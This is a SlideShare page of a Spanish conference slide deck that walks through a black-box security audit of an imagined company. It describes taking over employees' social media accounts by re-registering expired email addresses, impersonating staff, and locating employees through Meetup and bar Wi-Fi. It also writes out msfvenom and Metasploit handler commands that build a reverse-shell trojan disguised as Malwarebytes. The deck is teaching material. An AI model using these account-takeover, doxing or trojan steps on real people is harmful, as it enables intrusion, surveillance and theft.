SlideShare une entreprise Scribd logo
1  sur  35
Télécharger pour lire hors ligne
Auditoría de seguridad
en el sur
Por Jorge Websec
24/1/2016 WWW.QUANTIKA14.COM 1
¿Quién soy yo?
24/1/2016 WWW.QUANTIKA14.COM 2
•Fundador de empresas de seguridad informática
QuantiKa14.
•Fundador de EXO Security, localización de personas.
•Dueño del bar K’talo en la calle niebla 25, Sevilla.
•Fundador y miembro del proyecto WordPressA.
•Creador del proyecto Triana Browser.
•Autor del blog www.botentriana.wordpress.com
•Especialista en bots y BigData.
Seguridad en el sur…
•Sevilla: 1.100
•Cádiz: 393
•Huelva: 161
•Córdoba: 313
•Málaga: 972
•Jaén: 190
•Almería: 269
Datos de BigData QuantiKa14.
24/1/2016 WWW.QUANTIKA14.COM 3
Seguridad en el sur…
0
0,5
1
1,5
2
2,5
3
3,5
4
4,5
5
2012 2013 2014 2015
Creación de empresas Seguridad
Informática
Andalucia Madrid Barcelona
•Aumento del crecimiento en Andalucía.
•Constante crecimiento en Madrid y Barcelona.
24/1/2016 WWW.QUANTIKA14.COM 4
Procesos…
•Firma de contrato.
•Objetivos.
•Recogida de datos (footprinting &
fingerprinting)
•Análisis de vulnerabilidades.
•Explotación.
•Informe.
24/1/2016 WWW.QUANTIKA14.COM 5
Firma de contrato
•Empleados y directivos deben
firmar un contrato.
•Proveedores, colaboradores y
asociados firman o son avisados.
•Firma de contrato de
confidencialidad y secreto.
•Notificación previa de acciones
que pueden perjudicar
gravemente a la empresa.
•Formas y métodos de pago.
24/1/2016 WWW.QUANTIKA14.COM 6
Formas y métodos de pagos
•50 % en la firma del contrato.
•25% a los 20 días de la firma del
contrato.
•25% en la entrega del informe.
24/1/2016 WWW.QUANTIKA14.COM 7
OBJETIVOS
•Simular un ataque informático de
caja negra.
•Hacerlo en 40 días máximo.
•Informar de posibles fugas de
información o de accesos no
autorizados.
24/1/2016 WWW.QUANTIKA14.COM 8
La empresa…
24/1/2016 WWW.QUANTIKA14.COM 9
IMAGINEMOS A LA EMPRESA
24/1/2016 WWW.QUANTIKA14.COM 10
MECH3RO PACK
•Pack de scripts creados por Jorge
Websec para la recogida de datos.
BOTENTRIANA.WORDPRESS.COM
•Python 2.7.9
•Librerías: mechanize y
beautifulSoup.
24/1/2016 WWW.QUANTIKA14.COM 11
MECH3RO I
Redes sociales de la empresa.
24/1/2016 WWW.QUANTIKA14.COM 12
Listado de empleados
•Listado de trabajadores en la
empresa usando M3chero.
•Buscadores.
•Prensa.
•Harvesting email con email
collector Metasploit.
•LinkedIn.
24/1/2016 WWW.QUANTIKA14.COM 13
ASOCIACIÓN DE SEGURIDAD PRIVADA
Identificamos las asociaciones.
Eventos.
Páginas webs.
Obtenemos listado de
empleados del
departamento de
seguridad.
El objetivo es obtener el
listado de empleados.
La técnica de los 3 años
•Una cuenta de Hotmail, Outlook, Gmail, Yahoo, etc… duran 3 años
hasta ser borrados por inactividad.
•¿La cuenta de tu infancia es la misma que usas para las redes
sociales?
24/1/2016 WWW.QUANTIKA14.COM 15
MECH3RO II : validar cuenta de email
•Dentro de Mech3ro Pack encontraremos “email_validator.py”para
validar cuentas email masivamente.
24/1/2016 WWW.QUANTIKA14.COM 16
Mech3ro III: validar cuentas de
Twitter y FB
•Las cuentas de la lista que no existan por tiempo inactivo o porque el
usuario los haya borrado, creamos una nueva lista diferente.
•La nueva lista la usará “validator_twitter_fbyTwt.py” para asociar una
cuenta de correo a una cuenta de Facebook y Twitter.
•Las que den positivas en las cuentas de RRSS solo hará falta crear de
nuevo la cuenta y darle a recordar contraseña.
24/1/2016 WWW.QUANTIKA14.COM 17
PROCESOS
24/1/2016 WWW.QUANTIKA14.COM 18
LISTA DE EMAILS
¿EXISTE? SINo
ASOCIADO ALGUNA
CUENTA
Si
No
CREAR CORREO
RECUPERAR
CONTRASEÑA
OBJETIVO CUMPLIDO
• Conseguimos acceso a varias cuentas de Facebook y Twitter.
• Haciéndonos pasar por uno de los empleados de seguridad le pedimos a otro que hemos
perdido el listado y nos lo manda.
¿Localizar a empleados?
•El uso de Internet siempre deja
rastros de tu actividad en la vida
real.
•Sabiendo usar los datos que se
exponen en las diferentes
plataformas podemos saber
donde te mueves.
24/1/2016 WWW.QUANTIKA14.COM 20
Doxing: investigar, analizar, recopilar información de
una persona en Internet. Asociar una identidad
virtual a una física.
MECH3RO IV: Meetup
24/1/2016 WWW.QUANTIKA14.COM 21
Bot de Meetup
ACCEDE A MEETUP
http://www.meetup.com/es-
ES/find/events/?allMeetups=true&radius=62&userFre
eform=Sevilla
Bot de Meetup 2
ACCEDE A CADA EVENTO
MECH3RO V: CRUZAR DATOS I
24/1/2016 WWW.QUANTIKA14.COM 22
Usuarios que van a evento de
MeetUp
Diego
Martínez
Ricardo
Gonzalez
Juan
Jiménez
Un poquito de Ingeniería social…
•Sabíamos los eventos próximos
que visitarían.
•Sabiendo sus redes sociales
sabíamos sus gustos,
publicaciones y comentarios.
•Sabíamos que la empresa había
implementado un sistema de
acceso hace poco por una
subvención. ¿Biometría?
24/1/2016 WWW.QUANTIKA14.COM 23
¿Qué averiguamos?
•Existe un sistema de acceso a diferentes salas.
•Una empleada guarda claves de accesos a diferentes salas en un txt en
su ordenador. [¿Quién?]
•Los empleados suelen frecuentar diferentes bares de la zona donde se
encuentra el edificio de la empresa. [Podemos identificar según los
clientes Wifi]
24/1/2016 WWW.QUANTIKA14.COM 24
Bares de la zona…
•Café de Indias -> Wifi muy genérico ESSID:“CAFÉ-INDIAS-WIFI”.
•Mac Donald -> Demasiado genérico.
•Bar “el eructo feliz” -> ESSID:”ERUCTOFELIZ-WIFI”.
24/1/2016 WWW.QUANTIKA14.COM 25
De esta forma podíamos identificar en que eventos se encuentran
empleados de la empresa.
Suplantación de email
24/1/2016 WWW.QUANTIKA14.COM 26
Fake Malwarebytes Anti-malware
24/1/2016 WWW.QUANTIKA14.COM 27
Creamos el payload
24/1/2016 WWW.QUANTIKA14.COM 28
Creamos payload II
•# msfvenom -p windows/meterpreter/reverse_tcp -b ‘x00’
LHOST=192.168.1.10 LPORT=4444 -x /home/root/Escritorio/FAKE.exe -f
exe > bicho.exe
•-b: evitar caracteres vacíos o malos.
•-x: plantilla
•-i: interacciones del encoder
•-e: encoder -> x86/shikata_ga_nai
24/1/2016 WWW.QUANTIKA14.COM 29
Binder
24/1/2016 WWW.QUANTIKA14.COM 30
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <IP_Escucha> (por ejemplo set LHOST 192.168.5.55)
msf exploit(handler) > set LPORT <Puerto Escucha> (por ejemplo set LPORT 4444)
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.75.35:4444
[*] Starting the payload handler…
Escuchamos
24/1/2016 WWW.QUANTIKA14.COM 32
Pivoting: Mapa de red
Desde las máquinas infectadas hacemos
un escáner de la red.
Con el correo que le enviamos…
Registramos el USER-AGENT y la IP
Local.
http://net.ipcalf.com/
Le enviamos…Un mail con el enlace maligno.
¡Muchas gracias por su atención!
@QuantiKa14
/quantika14
/quantika14
Si quieres descargar MECH3RO PACK
VISITA MI BLOG BOTENTRIANA.WORDPRESS.COM

Contenu connexe

Tendances

091123 Intro + Habilidades Barcelona
091123 Intro + Habilidades   Barcelona091123 Intro + Habilidades   Barcelona
091123 Intro + Habilidades Barcelona
Roca Salvatella
 

Tendances (20)

Casos reales usando osint
Casos reales usando osintCasos reales usando osint
Casos reales usando osint
 
All in one OSINT
All in one OSINTAll in one OSINT
All in one OSINT
 
Búsqueda de personas desaparecidas a través de las tics
Búsqueda de personas desaparecidas a través de las ticsBúsqueda de personas desaparecidas a través de las tics
Búsqueda de personas desaparecidas a través de las tics
 
Diario de un perito informático: pruebas, evidencias y delitos informáticos
Diario de un perito informático: pruebas, evidencias y delitos informáticosDiario de un perito informático: pruebas, evidencias y delitos informáticos
Diario de un perito informático: pruebas, evidencias y delitos informáticos
 
Ronda de Hacking - Gambrinus challenge Sh3llcon
Ronda de Hacking - Gambrinus challenge Sh3llconRonda de Hacking - Gambrinus challenge Sh3llcon
Ronda de Hacking - Gambrinus challenge Sh3llcon
 
Cómo detectar que nos espían en nuestros móviles
Cómo detectar que nos espían en nuestros móvilesCómo detectar que nos espían en nuestros móviles
Cómo detectar que nos espían en nuestros móviles
 
NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.
 
Localización de personas desaparecidas a través de las nuevas tecnologías de ...
Localización de personas desaparecidas a través de las nuevas tecnologías de ...Localización de personas desaparecidas a través de las nuevas tecnologías de ...
Localización de personas desaparecidas a través de las nuevas tecnologías de ...
 
Webinar Gratuito: Consejos para Iniciar una Investigación OSINT
Webinar Gratuito: Consejos para Iniciar una Investigación OSINTWebinar Gratuito: Consejos para Iniciar una Investigación OSINT
Webinar Gratuito: Consejos para Iniciar una Investigación OSINT
 
CIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINTCIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINT
 
Open source intelligence y la unión de los mundos virtual y físico
 Open source intelligence y la unión de los mundos virtual y físico Open source intelligence y la unión de los mundos virtual y físico
Open source intelligence y la unión de los mundos virtual y físico
 
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
 
Big Data para la lucha contra la delincuencia
Big Data para la lucha contra la delincuenciaBig Data para la lucha contra la delincuencia
Big Data para la lucha contra la delincuencia
 
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
 
091123 Intro + Habilidades Barcelona
091123 Intro + Habilidades   Barcelona091123 Intro + Habilidades   Barcelona
091123 Intro + Habilidades Barcelona
 
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataques
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataquesWelcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataques
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataques
 
Seguridad en Internet para 6 Primaria Nuevo
Seguridad en Internet para 6 Primaria NuevoSeguridad en Internet para 6 Primaria Nuevo
Seguridad en Internet para 6 Primaria Nuevo
 
Forense informático a WordPress y Whatsapp usando aplicaciones open source
Forense informático a WordPress y Whatsapp usando aplicaciones open sourceForense informático a WordPress y Whatsapp usando aplicaciones open source
Forense informático a WordPress y Whatsapp usando aplicaciones open source
 
Seguridad en Internet v2
Seguridad en Internet v2Seguridad en Internet v2
Seguridad en Internet v2
 
Legal growth hacking
Legal growth hackingLegal growth hacking
Legal growth hacking
 

Similaire à Auditoría informática de seguridad de caja negra en el sur

Jornadas Emprendedores Granada2013. Ruth Blanch Martín “Qué puede hacer Inte...
Jornadas Emprendedores Granada2013.  Ruth Blanch Martín “Qué puede hacer Inte...Jornadas Emprendedores Granada2013.  Ruth Blanch Martín “Qué puede hacer Inte...
Jornadas Emprendedores Granada2013. Ruth Blanch Martín “Qué puede hacer Inte...
granadaempresas
 
Communitymanager camaradecomerciodelima mayo2013
Communitymanager camaradecomerciodelima mayo2013Communitymanager camaradecomerciodelima mayo2013
Communitymanager camaradecomerciodelima mayo2013
Sr. Zegarra Villalobos
 

Similaire à Auditoría informática de seguridad de caja negra en el sur (20)

Empresa familiar
Empresa familiarEmpresa familiar
Empresa familiar
 
Obtención de datos de redes sociales
Obtención de datos de redes socialesObtención de datos de redes sociales
Obtención de datos de redes sociales
 
Redes Sociales de más impacto
Redes Sociales de más impactoRedes Sociales de más impacto
Redes Sociales de más impacto
 
Conferencia claves negocios exitosos-lima peru-version1
Conferencia claves negocios exitosos-lima peru-version1Conferencia claves negocios exitosos-lima peru-version1
Conferencia claves negocios exitosos-lima peru-version1
 
Seminario acra 2013_maig
Seminario acra 2013_maigSeminario acra 2013_maig
Seminario acra 2013_maig
 
Apex 2010 hacer negocios por redes sociales- jorge mora - interdesa
Apex 2010   hacer negocios por redes sociales- jorge mora - interdesaApex 2010   hacer negocios por redes sociales- jorge mora - interdesa
Apex 2010 hacer negocios por redes sociales- jorge mora - interdesa
 
Artesanía 2.0 Pasos para iniciar un negocio exitoso en Internet
Artesanía 2.0 Pasos para iniciar un negocio exitoso en InternetArtesanía 2.0 Pasos para iniciar un negocio exitoso en Internet
Artesanía 2.0 Pasos para iniciar un negocio exitoso en Internet
 
Presentación
PresentaciónPresentación
Presentación
 
Introduccion al e marketing
Introduccion al e marketingIntroduccion al e marketing
Introduccion al e marketing
 
Jornadas Emprendedores Granada2013. Ruth Blanch Martín “Qué puede hacer Inte...
Jornadas Emprendedores Granada2013.  Ruth Blanch Martín “Qué puede hacer Inte...Jornadas Emprendedores Granada2013.  Ruth Blanch Martín “Qué puede hacer Inte...
Jornadas Emprendedores Granada2013. Ruth Blanch Martín “Qué puede hacer Inte...
 
Communitymanager camaradecomerciodelima mayo2013
Communitymanager camaradecomerciodelima mayo2013Communitymanager camaradecomerciodelima mayo2013
Communitymanager camaradecomerciodelima mayo2013
 
Ii curso oficial de coolhunting marzo 11
Ii curso oficial de coolhunting   marzo 11Ii curso oficial de coolhunting   marzo 11
Ii curso oficial de coolhunting marzo 11
 
Taller gratuito de gestión de redes sociales para pymes y emprendedores
Taller gratuito de gestión de redes sociales para pymes y emprendedoresTaller gratuito de gestión de redes sociales para pymes y emprendedores
Taller gratuito de gestión de redes sociales para pymes y emprendedores
 
Clinic seo enero 2015
Clinic seo enero 2015Clinic seo enero 2015
Clinic seo enero 2015
 
Copy of comercio_electrónico_2.ª_parte_plan_de_marketing_digital
Copy of comercio_electrónico_2.ª_parte_plan_de_marketing_digitalCopy of comercio_electrónico_2.ª_parte_plan_de_marketing_digital
Copy of comercio_electrónico_2.ª_parte_plan_de_marketing_digital
 
¡Cookiegeddon! Bye a las cookies de terceros y cómo afectará a tu software
¡Cookiegeddon! Bye a las cookies de terceros y cómo afectará a tu software¡Cookiegeddon! Bye a las cookies de terceros y cómo afectará a tu software
¡Cookiegeddon! Bye a las cookies de terceros y cómo afectará a tu software
 
Introducción curso Analítica Web La industrial
Introducción curso Analítica Web La industrialIntroducción curso Analítica Web La industrial
Introducción curso Analítica Web La industrial
 
Cómo gestionar la identidad digital de tu empresa
Cómo gestionar la identidad digital de tu empresaCómo gestionar la identidad digital de tu empresa
Cómo gestionar la identidad digital de tu empresa
 
Interlat Upb Curso Ebusiness Pymes Modulo I 2009
Interlat Upb Curso Ebusiness Pymes Modulo I 2009Interlat Upb Curso Ebusiness Pymes Modulo I 2009
Interlat Upb Curso Ebusiness Pymes Modulo I 2009
 
Introducción a las redes sociales
Introducción a las redes socialesIntroducción a las redes sociales
Introducción a las redes sociales
 

Plus de QuantiKa14

Plus de QuantiKa14 (19)

PEGASUS MI ARMA
PEGASUS MI ARMAPEGASUS MI ARMA
PEGASUS MI ARMA
 
Hacer prácticas en QuantiKa14 - ETSII 2020
Hacer prácticas en QuantiKa14 - ETSII 2020Hacer prácticas en QuantiKa14 - ETSII 2020
Hacer prácticas en QuantiKa14 - ETSII 2020
 
Ciberacoso, casos reales
Ciberacoso, casos realesCiberacoso, casos reales
Ciberacoso, casos reales
 
Tacita, análisis de APKS y big data
Tacita, análisis de APKS y big dataTacita, análisis de APKS y big data
Tacita, análisis de APKS y big data
 
Prueba digital y casos reales de peritaje informático
Prueba digital y casos reales de peritaje informáticoPrueba digital y casos reales de peritaje informático
Prueba digital y casos reales de peritaje informático
 
Ciberacoso por Jorge Coronado
Ciberacoso por Jorge CoronadoCiberacoso por Jorge Coronado
Ciberacoso por Jorge Coronado
 
Casos reales usando OSINT
Casos reales usando OSINTCasos reales usando OSINT
Casos reales usando OSINT
 
Ciberacoso
CiberacosoCiberacoso
Ciberacoso
 
Forense en WordPress
Forense en WordPressForense en WordPress
Forense en WordPress
 
Ciberseguridad para padres y madres
Ciberseguridad para padres y madresCiberseguridad para padres y madres
Ciberseguridad para padres y madres
 
Formacion para empresas para prevenir el ransomware
Formacion para empresas para prevenir el ransomwareFormacion para empresas para prevenir el ransomware
Formacion para empresas para prevenir el ransomware
 
Ciberseguridad para institutos
Ciberseguridad para institutosCiberseguridad para institutos
Ciberseguridad para institutos
 
Gestión de proyectos con Trello sin tener que ser software
Gestión de proyectos con Trello sin tener que ser softwareGestión de proyectos con Trello sin tener que ser software
Gestión de proyectos con Trello sin tener que ser software
 
La guía para prevenir el ransomware en empresas
La guía para prevenir el ransomware en empresasLa guía para prevenir el ransomware en empresas
La guía para prevenir el ransomware en empresas
 
Cuando la imagen está en peligro: herramientas legales y recursos más allá de...
Cuando la imagen está en peligro: herramientas legales y recursos más allá de...Cuando la imagen está en peligro: herramientas legales y recursos más allá de...
Cuando la imagen está en peligro: herramientas legales y recursos más allá de...
 
¿Qué es la ciberdelincuencia de género?
¿Qué es la ciberdelincuencia de género?¿Qué es la ciberdelincuencia de género?
¿Qué es la ciberdelincuencia de género?
 
Perito informático y ciberdelincuencia de género I
Perito informático y ciberdelincuencia de género IPerito informático y ciberdelincuencia de género I
Perito informático y ciberdelincuencia de género I
 
Cómo crear tu propio Shodan con Python
Cómo crear tu propio Shodan con PythonCómo crear tu propio Shodan con Python
Cómo crear tu propio Shodan con Python
 
Ataque masivo a WordPress con ILLOWP
Ataque masivo a WordPress con ILLOWPAtaque masivo a WordPress con ILLOWP
Ataque masivo a WordPress con ILLOWP
 

Dernier

Unidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disolucionesUnidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disoluciones
chorantina325
 

Dernier (6)

Las redes sociales en el mercado digital
Las redes sociales en el mercado digitalLas redes sociales en el mercado digital
Las redes sociales en el mercado digital
 
Unidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disolucionesUnidad V. Disoluciones quimica de las disoluciones
Unidad V. Disoluciones quimica de las disoluciones
 
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjjPPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
PPT-HISTORIA-6°-ABC.pptxjjjjjjjjjjjjjjjjjjjjjj
 
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
 
Corte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadCorte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuad
 
PSICOPATOLOGIA I.pptxdhehehehehehehehehe
PSICOPATOLOGIA I.pptxdhehehehehehehehehePSICOPATOLOGIA I.pptxdhehehehehehehehehe
PSICOPATOLOGIA I.pptxdhehehehehehehehehe
 

Auditoría informática de seguridad de caja negra en el sur

  • 1. Auditoría de seguridad en el sur Por Jorge Websec 24/1/2016 WWW.QUANTIKA14.COM 1
  • 2. ¿Quién soy yo? 24/1/2016 WWW.QUANTIKA14.COM 2 •Fundador de empresas de seguridad informática QuantiKa14. •Fundador de EXO Security, localización de personas. •Dueño del bar K’talo en la calle niebla 25, Sevilla. •Fundador y miembro del proyecto WordPressA. •Creador del proyecto Triana Browser. •Autor del blog www.botentriana.wordpress.com •Especialista en bots y BigData.
  • 3. Seguridad en el sur… •Sevilla: 1.100 •Cádiz: 393 •Huelva: 161 •Córdoba: 313 •Málaga: 972 •Jaén: 190 •Almería: 269 Datos de BigData QuantiKa14. 24/1/2016 WWW.QUANTIKA14.COM 3
  • 4. Seguridad en el sur… 0 0,5 1 1,5 2 2,5 3 3,5 4 4,5 5 2012 2013 2014 2015 Creación de empresas Seguridad Informática Andalucia Madrid Barcelona •Aumento del crecimiento en Andalucía. •Constante crecimiento en Madrid y Barcelona. 24/1/2016 WWW.QUANTIKA14.COM 4
  • 5. Procesos… •Firma de contrato. •Objetivos. •Recogida de datos (footprinting & fingerprinting) •Análisis de vulnerabilidades. •Explotación. •Informe. 24/1/2016 WWW.QUANTIKA14.COM 5
  • 6. Firma de contrato •Empleados y directivos deben firmar un contrato. •Proveedores, colaboradores y asociados firman o son avisados. •Firma de contrato de confidencialidad y secreto. •Notificación previa de acciones que pueden perjudicar gravemente a la empresa. •Formas y métodos de pago. 24/1/2016 WWW.QUANTIKA14.COM 6
  • 7. Formas y métodos de pagos •50 % en la firma del contrato. •25% a los 20 días de la firma del contrato. •25% en la entrega del informe. 24/1/2016 WWW.QUANTIKA14.COM 7
  • 8. OBJETIVOS •Simular un ataque informático de caja negra. •Hacerlo en 40 días máximo. •Informar de posibles fugas de información o de accesos no autorizados. 24/1/2016 WWW.QUANTIKA14.COM 8
  • 10. IMAGINEMOS A LA EMPRESA 24/1/2016 WWW.QUANTIKA14.COM 10
  • 11. MECH3RO PACK •Pack de scripts creados por Jorge Websec para la recogida de datos. BOTENTRIANA.WORDPRESS.COM •Python 2.7.9 •Librerías: mechanize y beautifulSoup. 24/1/2016 WWW.QUANTIKA14.COM 11
  • 12. MECH3RO I Redes sociales de la empresa. 24/1/2016 WWW.QUANTIKA14.COM 12
  • 13. Listado de empleados •Listado de trabajadores en la empresa usando M3chero. •Buscadores. •Prensa. •Harvesting email con email collector Metasploit. •LinkedIn. 24/1/2016 WWW.QUANTIKA14.COM 13
  • 14. ASOCIACIÓN DE SEGURIDAD PRIVADA Identificamos las asociaciones. Eventos. Páginas webs. Obtenemos listado de empleados del departamento de seguridad. El objetivo es obtener el listado de empleados.
  • 15. La técnica de los 3 años •Una cuenta de Hotmail, Outlook, Gmail, Yahoo, etc… duran 3 años hasta ser borrados por inactividad. •¿La cuenta de tu infancia es la misma que usas para las redes sociales? 24/1/2016 WWW.QUANTIKA14.COM 15
  • 16. MECH3RO II : validar cuenta de email •Dentro de Mech3ro Pack encontraremos “email_validator.py”para validar cuentas email masivamente. 24/1/2016 WWW.QUANTIKA14.COM 16
  • 17. Mech3ro III: validar cuentas de Twitter y FB •Las cuentas de la lista que no existan por tiempo inactivo o porque el usuario los haya borrado, creamos una nueva lista diferente. •La nueva lista la usará “validator_twitter_fbyTwt.py” para asociar una cuenta de correo a una cuenta de Facebook y Twitter. •Las que den positivas en las cuentas de RRSS solo hará falta crear de nuevo la cuenta y darle a recordar contraseña. 24/1/2016 WWW.QUANTIKA14.COM 17
  • 18. PROCESOS 24/1/2016 WWW.QUANTIKA14.COM 18 LISTA DE EMAILS ¿EXISTE? SINo ASOCIADO ALGUNA CUENTA Si No CREAR CORREO RECUPERAR CONTRASEÑA
  • 19. OBJETIVO CUMPLIDO • Conseguimos acceso a varias cuentas de Facebook y Twitter. • Haciéndonos pasar por uno de los empleados de seguridad le pedimos a otro que hemos perdido el listado y nos lo manda.
  • 20. ¿Localizar a empleados? •El uso de Internet siempre deja rastros de tu actividad en la vida real. •Sabiendo usar los datos que se exponen en las diferentes plataformas podemos saber donde te mueves. 24/1/2016 WWW.QUANTIKA14.COM 20 Doxing: investigar, analizar, recopilar información de una persona en Internet. Asociar una identidad virtual a una física.
  • 21. MECH3RO IV: Meetup 24/1/2016 WWW.QUANTIKA14.COM 21 Bot de Meetup ACCEDE A MEETUP http://www.meetup.com/es- ES/find/events/?allMeetups=true&radius=62&userFre eform=Sevilla Bot de Meetup 2 ACCEDE A CADA EVENTO
  • 22. MECH3RO V: CRUZAR DATOS I 24/1/2016 WWW.QUANTIKA14.COM 22 Usuarios que van a evento de MeetUp Diego Martínez Ricardo Gonzalez Juan Jiménez
  • 23. Un poquito de Ingeniería social… •Sabíamos los eventos próximos que visitarían. •Sabiendo sus redes sociales sabíamos sus gustos, publicaciones y comentarios. •Sabíamos que la empresa había implementado un sistema de acceso hace poco por una subvención. ¿Biometría? 24/1/2016 WWW.QUANTIKA14.COM 23
  • 24. ¿Qué averiguamos? •Existe un sistema de acceso a diferentes salas. •Una empleada guarda claves de accesos a diferentes salas en un txt en su ordenador. [¿Quién?] •Los empleados suelen frecuentar diferentes bares de la zona donde se encuentra el edificio de la empresa. [Podemos identificar según los clientes Wifi] 24/1/2016 WWW.QUANTIKA14.COM 24
  • 25. Bares de la zona… •Café de Indias -> Wifi muy genérico ESSID:“CAFÉ-INDIAS-WIFI”. •Mac Donald -> Demasiado genérico. •Bar “el eructo feliz” -> ESSID:”ERUCTOFELIZ-WIFI”. 24/1/2016 WWW.QUANTIKA14.COM 25 De esta forma podíamos identificar en que eventos se encuentran empleados de la empresa.
  • 26. Suplantación de email 24/1/2016 WWW.QUANTIKA14.COM 26
  • 28. Creamos el payload 24/1/2016 WWW.QUANTIKA14.COM 28
  • 29. Creamos payload II •# msfvenom -p windows/meterpreter/reverse_tcp -b ‘x00’ LHOST=192.168.1.10 LPORT=4444 -x /home/root/Escritorio/FAKE.exe -f exe > bicho.exe •-b: evitar caracteres vacíos o malos. •-x: plantilla •-i: interacciones del encoder •-e: encoder -> x86/shikata_ga_nai 24/1/2016 WWW.QUANTIKA14.COM 29
  • 31. msf> use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST <IP_Escucha> (por ejemplo set LHOST 192.168.5.55) msf exploit(handler) > set LPORT <Puerto Escucha> (por ejemplo set LPORT 4444) msf exploit(handler) > exploit [*] Started reverse handler on 192.168.75.35:4444 [*] Starting the payload handler… Escuchamos
  • 32. 24/1/2016 WWW.QUANTIKA14.COM 32 Pivoting: Mapa de red Desde las máquinas infectadas hacemos un escáner de la red.
  • 33. Con el correo que le enviamos… Registramos el USER-AGENT y la IP Local. http://net.ipcalf.com/
  • 34. Le enviamos…Un mail con el enlace maligno.
  • 35. ¡Muchas gracias por su atención! @QuantiKa14 /quantika14 /quantika14 Si quieres descargar MECH3RO PACK VISITA MI BLOG BOTENTRIANA.WORDPRESS.COM